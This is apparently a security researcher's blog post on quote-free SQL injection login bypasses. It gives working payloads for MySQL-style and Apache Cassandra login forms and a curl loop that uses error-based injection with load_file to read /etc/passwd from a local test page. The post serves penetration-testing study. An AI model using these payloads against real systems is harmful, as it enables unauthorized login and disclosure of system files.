Thinking About Simple SQL Injections

Login bypass with no quotes allowed.

About 3 years ago, in 2018, I wrote about some SQL injection in login forms without a quote to break out from string delimiter, in an old Eternal Noobs web site.

You can find the original post here.

After some time, a refinement of it made room to the following meme caption:

Backslash payload for login bypass.
username: /1#\
password: /1#\

It’s simple and beautiful. No quotes, no assignment, no comments. You just use it in username and password fields and if it’s vulnerable, boom!

But if there’s some of hash function like demonstrated in this old video below, it won’t work.

Video on MySQL injection.

In that case you will need this:

The logic of ignoring password field in SQLi without commenting.
username: '-0||'
password: [non-empty]

There’s no way to use backslash here since password field will always return a hash. Resulting string is not that beautiful but the explanation is!

Why I’m showing you that? It’s because you usually don’t see those anywhere and it might be useful some time. But those are for “quick hacks”.

The most famous SQLi tool, sqlmap, can easily handle this 2nd case but if you don’t let it know there’s that backslash catch for the 1st one, it won’t find that.

As well as with Apache Cassandra, which login challenge was published also in 2018. It’s not that common to find it in the wild specially for a login form but if you ever face one, here’s the way to bypass it:

Apache Cassandra login bypass.
username: admin'/*
password: */and pass>'

You need to guess both username and password fields (not that hard, right?).

Just for fun and to sharpen my SQL skills I’ve got a PoC for LFR with backslash simply using command-line cURL.

PoCing LFR with backslash-based SQLi.
for n in {1..16}; do curl -sd "user=\\&pass=/extractvalue(1,concat(0,(substring_index(substring_index(load_file(0x2f6574632f706173737764),0xA,$n),0xA,-1))))#" localhost/sqli/login.php | grep -o "'.*'" | tr -d "'"; done

Because “XPATH Error” returns a limited amount of chars and it’s just for PoC purposes. You can easily figure out what’s happening there with some online search (this is not a tutorial, sorry).

As well as with XSS, exploitation of multi entry points for any type of injection are not that common and complex to automate so I hope this post makes you think about it.

More original content about databases coming, stay tuned.

#hack2learn

Check my XSS online stuff, it might help you somehow! :-)

KNOXSS

Brute XSS Blog

Brute XSS Cheat Sheet

Thanks for your attention!

Rodolfo.

Artist, free thinker. Computer hacker known as Brute (@brutelogic). Follow me in Twitter @rodoassis.